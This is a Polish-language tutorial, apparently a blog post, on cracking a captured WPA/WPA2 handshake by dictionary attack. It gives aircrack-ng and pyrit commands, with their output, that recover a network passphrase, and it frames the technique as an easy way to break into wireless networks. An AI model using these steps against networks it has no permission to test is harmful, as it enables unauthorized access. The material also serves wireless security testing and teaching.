Ten tutorial jest kontynuacją artykułu dotyczącego przechwytywania pakietów z handshakepokazujący jak łatwo odzyskać hasło lub włamać się do sieci bezprzewodowej chronionej przez WPA/WPA2.
No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno programu airodump-ng gdy handshake został złapany, ale to już wiesz:
[ CH 1 ][ Elapsed: 12 s ][ 2011-01-12 17:24 ][ WPA handshake: 00:04:ED:A3:80:11] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:04:ED:A3:80:11 -53 40 130 27 9 1 54 WPA2 CCMP PSK NASA BSSID STATION PWR Rate Lost Packets Probes 00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 25 NASA 00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25 |
Skoro już go masz to należy go teraz zepsuć!
Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to poleceniem:
aircrack-ng -w slownik.txt -b 00:04:ED:A3:80:11 NASA.cap [00:05:48] 664220 keys tested (2100.59 k/s) Current passphrase: imakinlazczsupzoR Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F 45 F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24 26 56 DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83 BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16 C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F |
W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży słownik to często go używam
Aircrack-ng 1.0 [00:11:45] 8914110 keys tested (2041.75 k/s) KEY FOUND! [ haxored1 ] Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE 72 55 48 F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC 3F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94 06 90 AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11 EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5 |
W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować pyrit wraz z cpyrit dla kart ATI z OCL.
Użyjemy teraz projektu z Summer Google Code do ataku na handshake. Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie jest to i7 740QM + ATI HD5730)
Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa developera narzędzia).
Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa dane handshake.
$ pyrit -r NASA-01.cap analyze Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file 'NASA-01.cap' (1/1)... Parsed 7 packets (7 802.11-packets), got 1 AP(s) #1: AccessPoint 00:04:ed:a3:80:11 ('NASA'): #1: Station 00:1f:e1:02:dc:9e #2: Station 00:4f:78:00:a2:a5, 1 handshake(s): #1: HMAC_SHA1_AES, good, spread 1 #3: Station 48:5d:60:34:a8:59 |
No skoro wykrywa to dowiedzmy się jakie jest hasło:
$ pyrit -r NASA-01.cap -i slownik.txt -b 00:04:ED:A3:80:11 attack_passthrough Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file 'NASA-01.cap' (1/1)... Parsed 7 packets (7 802.11-packets), got 1 AP(s) Tried 120006 PMKs so far; 12304 PMKs per second. The password is 'haxored1'. |
pyrit -r NASA-01.cap -i slownik.txt -b 00:04:ED:A3:80:11 attack_passthrough |
-r plik cap.
-i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem
-b <tutaj_bssid>
na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany jest jakoattack_passthrough
Komentarz
od-autorski:
Nie, nie warto używać tęczowych tablic do ataków
na WPA/WPA2, stracisz miesiące (lata?) na tworzenie takich tablic,
hasło w tym czasie może zostać zmienione, wtedy ponownie będzie
trzeba uzyskać handshake. W tym wypadku słowniki są najlepszym
rozwiązaniem.